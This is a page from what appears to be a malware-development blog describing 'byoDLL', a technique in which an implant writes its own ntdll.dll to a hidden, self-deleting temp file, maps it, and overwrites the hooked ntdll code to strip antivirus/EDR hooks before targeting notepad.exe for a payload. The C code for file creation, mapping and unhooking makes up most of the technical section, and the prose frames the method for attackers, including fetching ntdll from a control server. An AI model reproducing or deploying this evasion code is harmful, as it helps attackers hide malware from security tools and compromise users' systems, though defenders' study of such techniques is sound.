💀
0xTriboulet
  • Introduction
  • Achieving Access
    • achieving access: implantv1
    • achieving access: implantv2
    • achieving access: implantv3
  • Deceiving Defender
    • Deceiving Defender: Making nc.exe viable again
    • Deceiving Defender: Classic Bypass
    • Deceiving Defender: Name Bypass
    • Deceiving Defender: The Texas Two Step
    • Deceiving Defender: The Big Stack Bypass
      • Making Meterpreter Viable Again
    • Deceiving Defender: Meterpreter
  • Making Malware
    • making malware #0
    • making malware #1
    • making malware #2
  • Just Malicious
    • Advanced String Obfuscation
    • From C, with inline assembly, to shellcode
    • Thnks4RWX
  • TTPs
    • TTPs: Embedding Payloads with MSFVenom (x86)
    • TTPs: Embedding Payloads with MSFVenom (x64)
    • TTPs: Rust vs C++
    • TTPs: JmpNoCall
    • TTPs: BadAsm
    • TTPs: BadStrings
  • Unholy Unhooking
    • Unholy Unhooking: byoDLL
    • Unholy Unhooking: FrByoDLL
    • Unholy Unhooking: Rusty Fart
  • Weird Windows
    • Command Hijacking with .COM
    • Non-Existent File Paths
  • ZeroTotal
    • ZeroTotal: Msfvenom Calc
    • ZeroTotal: Self-Injecting Calc
    • ZeroTotal: Rusty Calc
  • Disclaimers
Powered by GitBook
On this page
  • Part One: Introduction
  • Part Two: Bringing Back the Classics
  • Part Three: tHe c0de
  • Part Four: ????
  • Part Five: Profit
  • References

Unholy Unhooking: byoDLL

Using our own copy of ntdll.dll, our implant will clear AV hooks and execute a malicious payload.

PreviousUnholy UnhookingNextUnholy Unhooking: FrByoDLL

Last updated 11 months ago

Part One: Introduction

If you've been paying attention to some of the recent news in malware development, then you've probably noticed that the death of Halo's Gate is coming.

In short, Microsoft has implemented a new syscall numbering system on WOW64 that effectively breaks the underlying assumptions about syscall numbers that Halo's Gate uses to unhook executables. Because the latest Windows builds do not have directly incrementing numbers, Halo's gate will fail and exploits on these newer systems will become detectable.

There's a couple of remaining tricks that resolve this issue, Perun's Fart and a modified Hell's Gate could do the trick, but Perun's Fart relies on creating a sacrificial suspended process and then accessing that process' memory in order to get a clean copy of ntdll. Creating suspended processes is an OPSEC expensive operation, and modifying Hell's Gate may work for the near future, but future changes to the numbering could kill that methodology as well.

Thanks to @woolgatherer99 for pointing out that the new syscall numbering only applies to WOW64

Part Two: Bringing Back the Classics

The classic unhooking methodology is to load a clean copy of ntdll from disk, and thereby clear the hooks from our hooked dll. In this write up, we're going to explore a deviation of that process. Instead of loading a clean copy of ntdll.dll from disk, we're going to bring our own dll (byoDLL) to our target system, load it during execution, and then execute some malicious code.

This variation of the classic unhooking methodology allows attackers to deploy small probing malware that determines the Windows build version, download a copy of ntdll.dll from a control server, deploy it in the target environment, and finally load the main malware. We're going to simulate some of this workflow by simply hardcoding our copy of ntdll into our implant, but this is just a proof of concept (PoC) for the proposed methodology above. More advanced techniques are up to you.

Part Three: tHe c0de

Rather than calling LoadLibrary, we're going to open the file, map the contents, and then use the contents to overwrite the .text section of our hooked .dll. In essence this is the same as the classic methodology, with the added step of writing your dll to disk with the "FILE_FLAG_DELETE_ON_CLOSE | FILE_ATTRIBUTE_TEMPORARY | FILE_ATTRIBUTE_HIDDEN" flags which should help retain OPSEC.

The entire code can be found on my Github, but the most interesting bits are below.

printf("Creating file...\n");
// create a hidden temp file
fileHandle = CreateFileA( lpFileName, GENERIC_ALL, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_FLAG_DELETE_ON_CLOSE | FILE_ATTRIBUTE_TEMPORARY | FILE_ATTRIBUTE_HIDDEN, NULL);
if(fileHandle == INVALID_HANDLE_VALUE){
	printf("FAILED TO CREATE FILE!\n");
	return -1;
}
		
printf("Writing to file...\n");
// write to file
if(!WriteFile(fileHandle,(LPCVOID) raw_ntdll, (DWORD) raw_ntdll_len, lpNumberOfBytesWritten, lpOverlapped)){
	printf("FAILED TO WRITEFILE!\n");
	return -1;
}
		
// prepare file mapping
printf("Creating file mapping...\n");
hFileMapping = CreateFileMappingA_p(fileHandle, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
if (! hFileMapping) {
	// file mapping failed
	printf("FAILED MAPPING OF FILE!\n");
	CloseHandle(fileHandle);
	return -1;
}
		
// map the bastard
printf("Creating map view...\n");
pMapping = MapViewOfFile_p(hFileMapping, FILE_MAP_READ, 0, 0, 0);
if (!pMapping) {
	// mapping failed
	printf("FAILED MAPVIEW OF FILE!\n");
	CloseHandle(hFileMapping);
	CloseHandle(fileHandle);
	return -1;
}
	
//unhook our program
printf("Setup complete...unhook?\n");
getchar();
ret = UnhookNtdll(GetModuleHandle((LPCSTR) sNtdll), (LPVOID) pMapping);
printf("Unhooking process complete.\n");
printf("Cleaning up...\n\n");
	
// Clean up.
UnmapViewOfFile_p(pMapping);
CloseHandle(hFileMapping);
CloseHandle(fileHandle);
//DeleteFileA(lpFileName); //explicit deleting in case the file survives
	
printf("Looking for target...\n");
pid = FindTarget("notepad.exe");

Part Four: ????

[Intentionally Left Blank]

Part Five: Profit

Hooked NtCreateThreadEx:

Unhooked NtCreateThreadEx:

Hitting NtCreateThreadEx in execution:

Result:

References

My code

https://www.sektor7.net/

Page cover image
Graphic from: https://github.com/Bw3ll/ShellWasp
LogoGitHub - Bw3ll/ShellWasp: ShellWasp is a tool to help build shellcode that utilizes Windows syscalls, while overcoming the portability problem associated with Windows syscalls. ShellWasp is built for 32-bit, WoW64.GitHub